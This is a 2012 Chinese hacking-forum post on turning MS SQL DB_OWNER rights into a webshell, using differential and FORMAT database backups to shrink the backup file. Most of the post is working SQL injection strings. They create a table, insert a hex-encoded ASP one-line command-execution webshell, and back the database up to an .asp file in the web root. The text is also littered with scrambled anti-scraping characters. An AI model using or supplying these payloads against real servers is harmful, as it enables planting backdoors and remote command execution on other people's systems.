找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2220|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进办法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:31:07 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
DB_OWNER权限得到webshell的两点改进:- X+ ^) P+ Y/ \; [0 d" d
: r3 p5 \8 m" |& Y# D4 w3 U
减少备份文件大小,得到可执行的webshell成功率提高不少
, I9 ^: Q9 T/ B: [一利用差异备份
) C) U# v2 ~5 [加一个参数WITH DIFFERENTIAL
- \! P- q: h' T( j( C$ A
1 ]( ~! b: v* }6 [1: T( R  _1 g  G5 G# F" l" U
2, I$ O# K& T$ M) I9 T! k
3# J* \, g. U& O# r) y
4
5 k) B# k# ]+ l# R4 F" f declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
* P5 m  k" G9 h$ screate table [dbo].[xiaolu] ([cmd] [image]);) R) Q% W9 y0 A8 M. P: Q% V
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)! P* e7 @: m+ I9 A4 f
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL 8 I6 v3 p8 f  c( g8 R

5 m# x9 D; ^, L" F2 R二利用完全FORMAT& K4 q" S' q" R
加一个参数WITH FROMAT
5 T8 r3 t: J4 z* a有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以$ W6 q3 R( Z$ W2 u$ G$ V' k$ G) \

2 \1 \$ S: y; ~" m) r/ z1+ ~/ C4 I  F* G/ [- C5 p3 x
2
5 ^7 N! }7 w. D: P2 W1 _( [, F3
: \, }6 b: l$ ^+ v4 n( |& c7 Z3 }: E44 Q7 |; o8 i( p4 H' {; ~; B
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s# t  f1 C4 S6 [
create table [dbo].[xiaolu] ([cmd] [image]);; }; G' _) w0 ~1 q/ f( m3 u
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)7 U% u6 h- _7 z
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
9 _0 m6 W3 n4 S' h  j" r/ w- n. ]
: E, b- o" H3 Y) @7 \总的来说就是那么简单几句,下面以备份数据库model为例子
7 v+ F9 W9 B  t5 @% w1: s3 q" d$ N( m& @! r6 u4 G8 S9 `
# }; X( k# m7 W
1; p$ \: \; ]% p! k
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>') 3 t2 \5 E8 ^4 ^
7 [" X2 C. }7 }* @& i
2
3 a6 r( T7 _  g
5 V( m# L1 A2 `3 @% y1' `6 h/ i# z" K  L
id=1;backup database model to disk='你的路径‘ with differential,format;--
) d, [/ e, o, k0 @1 M5 L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表